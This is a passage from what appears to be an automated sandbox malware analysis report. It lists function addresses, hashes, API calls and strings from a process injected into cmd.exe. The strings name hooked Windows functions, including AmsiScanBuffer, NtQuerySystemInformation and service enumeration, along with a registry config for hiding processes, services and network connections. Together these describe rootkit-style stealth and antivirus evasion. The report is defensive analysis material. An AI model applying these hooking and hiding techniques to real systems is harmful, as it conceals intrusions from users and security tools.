                                            • Instruction ID: 383217fff9344e8a22cddf8481b819d225cfad024f4986472a2441910a6c3a26
                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: EFA15A32F6CE8445FB26DBB19C483AD6BA1E7C1BD5F946031DE4417E98CA34C261E708
                                            Function 00000253FC408090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: f689e4bdf539991d75b311556a79c3185f7ed38771ab50e22269851d20090f3e
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: B2113036B54F088AEB01CF61FC593A833B4F719799F441E21DA6D46BA4DF78C2648344
                                            Function 00000253FC40D894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00000253FC40D220: HeapAlloc.KERNEL32(?,?,00000000,00000253FC40C987), ref: 00000253FC40D275
                                              • Part of subcall function 00000253FC410EB8: _invalid_parameter_noinfo.LIBCMT ref: 00000253FC410EEB
                                            • FindFirstFileExW.KERNEL32 ref: 00000253FC40DB99
                                              • Part of subcall function 00000253FC40D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000253FC40674A), ref: 00000253FC40D2B6
                                              • Part of subcall function 00000253FC40D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000253FC40674A), ref: 00000253FC40D2C0
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2436724071-0
                                            • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                            • Instruction ID: 6c27e006430e11ddb22ae68fdfaf7a44bffd02c0191f88c36c82915789031eb1
                                            • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                            • Instruction Fuzzy Hash: 24812A32BC8F8445EB2ADF22AC4935EB791E744BD1F045115AE9907FA5DE3CC265C708
                                            Function 00000253FC43D894 Relevance: 1.7, APIs: 1, Instructions: 234COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00000253FC43D220: HeapAlloc.KERNEL32(?,?,00000000,00000253FC43C987), ref: 00000253FC43D275
                                              • Part of subcall function 00000253FC440EB8: _invalid_parameter_noinfo.LIBCMT ref: 00000253FC440EEB
                                            • FindFirstFileExW.KERNEL32 ref: 00000253FC43DB99
                                              • Part of subcall function 00000253FC43D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000253FC43674A), ref: 00000253FC43D2B6
                                              • Part of subcall function 00000253FC43D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000253FC43674A), ref: 00000253FC43D2C0
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2436724071-0
                                            • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                            • Instruction ID: ef8e49b32c6e8a090c3556ec2cd50822b31f2ffff0517cfc8940bff592d10b8f
                                            • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                            • Instruction Fuzzy Hash: DF816932B68E8441EB2ADFA1AC4835EB791F7C4BD1F845135AE9907F95CE38C261D308
                                            Function 00000253FC40F440 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: HeapProcess
                                            • String ID:
                                            • API String ID: 54951025-0
                                            • Opcode ID: c14d8c3a46983987e9399fd1bc9cf0533130a6bceae918962a4bd8475db83ae9
                                            • Instruction ID: 00b6ff3f0bce4187b4fa2b6ae58bb7877a748ec946be4bb897b5cd881254434c
                                            • Opcode Fuzzy Hash: c14d8c3a46983987e9399fd1bc9cf0533130a6bceae918962a4bd8475db83ae9
                                            • Instruction Fuzzy Hash: C2B09230E87E48C6EB4BAB126C8A34422E4BB88B52FA46028C08C81720DA3C06B54B04
                                            Function 00000253FC3D23F0 Relevance: .3, Instructions: 256COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction ID: 433bb8a329592bc12bf6654cc3959ffaf980a2582f1fa474f52ef5feacbfe98f
                                            • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                            • Instruction Fuzzy Hash: AEB1C431A58E9D82EB68CFA5D828799A3A5F744BC6F006017EE0953F95DB3ECE40C744
                                            Function 00000253FC3DCE18 Relevance: .2, Instructions: 240COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
                                            • Instruction ID: 69eb25c0bc27b2f2571852be8503ddd12845f796b09dfe4b22637d8a112b4771
                                            • Opcode Fuzzy Hash: 9f4f0e9bd47f1bfdedf4b775ca86e3d575203b640b2156497393b07ceb78223e
                                            • Instruction Fuzzy Hash: E6A12932F58E8D45FB20DBB5AC683AD7BA1E3817D6F146016DE4527E95CA3CC242C708
                                            Function 00000253FC3DCC94 Relevance: .2, Instructions: 234COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 3215553584-0
                                            • Opcode ID: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
                                            • Instruction ID: 04ff29d726ed1bdd62d6b2a8ab691f2d7b5a31266cb15d0a8ceb13014e46f0e0
                                            • Opcode Fuzzy Hash: 62e993fff46357151edcc5153368e15278213980a8013bd1398bff7cc139778e
                                            • Instruction Fuzzy Hash: 10810832B68E8C45EB20DFA2BC6839EA791E385BD1F145116AE9947F95DE3CC2438704
                                            Function 00000253FC3E2AF0 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                            • Instruction ID: edfe39b0f28cd47b00fb367706ec48ce029e4237a986eda955636b07b7d1fdab
                                            • Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                            • Instruction Fuzzy Hash: 7F11CCB1A9C98B8AF75DDF69AC593593791E3043C5F40541FC44986E94C73EC2909F08
                                            Function 00000253FC401724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3414887735
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: c2c8c8362194f2ed02e52c3436e422369e64b730ac7919a933676a2416c4bbe5
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: 3B713C36B94E1889EB12DF62EC986982774FB84BCEF402111DD8E53F28DE34C664C748
                                            Function 00000253FC431724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3414887735
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: ee58faad4dfa1f58f98291d5e1af21f7bb67b176d79939ee6dd668a3e5e1729d
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: F0712A36B54E4885EB21DF21EC58A982374FB84BCEF902122DD4E57F28DE38C664D748
                                            Function 00000253FC431E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95memorythreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                            • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                            • API String ID: 1735320900-4225371247
                                            • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction ID: 7f5964844ecfe9ee04adda162aea3f01c0d4c4e2268bca0172e23327c6e662f6
                                            • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                            • Instruction Fuzzy Hash: 97518270D88E4EA5EA13DB68EC4DBD43320A7807D7F946923980912D66DE38837AD74C
                                            Function 00000253FC4012B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 75e2f7399ec0e385166b5f745de32dbeb41a36f22d86e7704eb634ab718eb5a5
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: 87516332A94F8896E716CF62E84839A77A1F788FD5F445124DE8A07B68DF3CC155CB04
                                            Function 00000253FC4312B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: aed21bbc420e1b388e3d8e984acef087d2d8e85c663a69822b249977cdef66d7
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: A8515F32A44F8896EB11CF62E84879A77A1F788FD6F545124DE5A07B18DF3CC155CB04
                                            Function 00000253FC40EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 1d4058bf6d308f33c248ea1c0af037f01ad20d94d997632c3197446b10f87164
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 5751A131FC9F0855FA17DB56AC083A52260BB48BF2F4827249E7D47BE1DF38D6258248
                                            Function 00000253FC43EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: 6a0ece79cf592ea995f3c1fd6984bc93a6820ef00ba1724a9e87556f37fc4945
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 0951C331F49E0851FE16DB56AC087A52260BB88BF2F9827319E3D07BD1DF38D625D608
                                            Function 00000253FC4033A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: 0d1376538cb570799c4fdbb17197ca727b28e4adbfd95e780eecebde093e27f6
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: 8331E532EC8E4896E723DF12AC4C399A7A0F788BD6F441125DE4947E34DF38C6668304
                                            Function 00000253FC4333A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: 203eecbfd582e29e6a49be7f54b428c533bb29be48f7c5961bfe65a23e7437fc
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: 9931D432E48E4896EB22CF12AC0C799A3A0F7D8BC6F945525DE4D43E24DF38C666C704
                                            Function 00000253FC4034B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: 493205c5b0ab69850340e27d6fedd2b723199c45b1d914b9c7f81992b4b73afb
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: BB318F31ED8F498AE712DF23AC4876967A0B784FE6F4461259E8A43B74DF38C6618704
                                            Function 00000253FC4334B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
